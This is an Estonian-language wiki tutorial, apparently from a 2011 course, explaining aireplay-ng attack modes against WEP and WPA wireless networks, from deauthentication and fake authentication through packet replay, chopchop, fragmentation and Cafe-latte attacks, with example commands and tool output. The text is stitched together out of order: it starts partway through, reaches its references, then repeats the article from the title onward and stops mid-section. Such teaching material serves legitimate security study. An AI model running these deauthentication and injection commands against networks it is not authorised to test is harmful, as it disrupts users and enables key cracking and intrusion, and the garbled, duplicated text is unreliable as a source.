Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
21:40:20 Sending Authentication Request
21:40:20 Authentication successful
21:40:20 Sending Association Request
21:40:20 Association successful :-)
...
</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>...
15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0
Read 4 packets...

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 de00 0014 6c7e 4080 000f b534 3030 .A....l~@....400
0x0010: ffff ffff ffff 4045 d16a c800 6f4f ddef ......@E.j..oO..
0x0020: b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162 ...|.*d....c..Ab
0x0030: 8ad9 2f74 16bb abcf 232e 97ee 5e45 754d ../t....#...^EuM
0x0040: 23e0 883e #..>

Use this packet ? y
</pre>

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0
Read 10 packets...

Size: 124, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = BB:BB:BB:BB:BB:BB
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 2c00 0014 6c7e 4080 000f b534 3030 .A,...l~@....400
0x0010: 0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7 .@.w....=y...Y+.
0x0020: 96e7 fadf e0de 2e99 c019 4f85 9508 3bcc ..........O...;.
0x0030: 8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7 ..........X...{.
0x0040: 8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d ..i...;.Cj..v,..
0x0050: 7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913 zW?=.<.....emf..
0x0060: 9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825 ....o..h+ U...%
0x0070: bf22 960a 5c7b 3036 290a 89d6 ."..\{06)...

Use this packet ? y
</pre>

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi ''plaintekst'' väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine ''broadcasti'' ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab ''custom'' pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

===ARP===
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]

===IP===
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks ''bit flippingut''. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC'i muutmiseks juhul kui seal on algselt ''multicast''.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

[[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-24T18:57:14Z

Tliiv: /* Naturaalsed paketid */

=Autor=
Tanel Liiv D22 (2011)

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta ''broadcastis''.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP ''cache'' tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]

===Meetodid===

====Suunatud====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA -c CC:CC:CC:CC:CC:CC mon0
21:36:02 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|38 ACKs]
21:36:03 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:04 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 38|50 ACKs]
21:36:05 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 54|54 ACKs]
21:36:06 Sending 64 directed DeAuth. STMAC: [CC:CC:CC:CC:CC:CC] [ 2|54 ACKs]
...
</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud ''versus'' broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]

Kui sulle kliendi ACK'ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA mon0
21:33:25 Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:33:25 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:26 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:27 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
21:33:28 Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]
...
</pre>
Nagu mainitud, ''broadcast'' lahtiühendamine on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0
21:40:20 Sending Authentication Request
21:40:20 Authentication successful
21:40:20 Sending Association Request
21:40:20 Association successful :-)
...
</pre>
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.
<pre>...
15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA ''handshake'' paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud ''handshake''`id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

<pre>
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0
Read 4 packets...

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = AA:AA:AA:AA:AA:AA
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = CC:CC:CC:CC:CC:CC

0x0000: 0841 de00 0014 6c7e 4080 000f b534 3030 .A....l~@....400
0x0010: ffff ffff ffff 4045 d16a c800 6f4f ddef ......@E.j..oO..
0x0020: b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162 ...|.*d....c..Ab
0x0030: 8ad9 2f74 16bb abcf 232e 97ee 5e45 754d ../t....#...^EuM
0x0040: 23e0 883e #..>

Use this packet ? y
</pre>

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

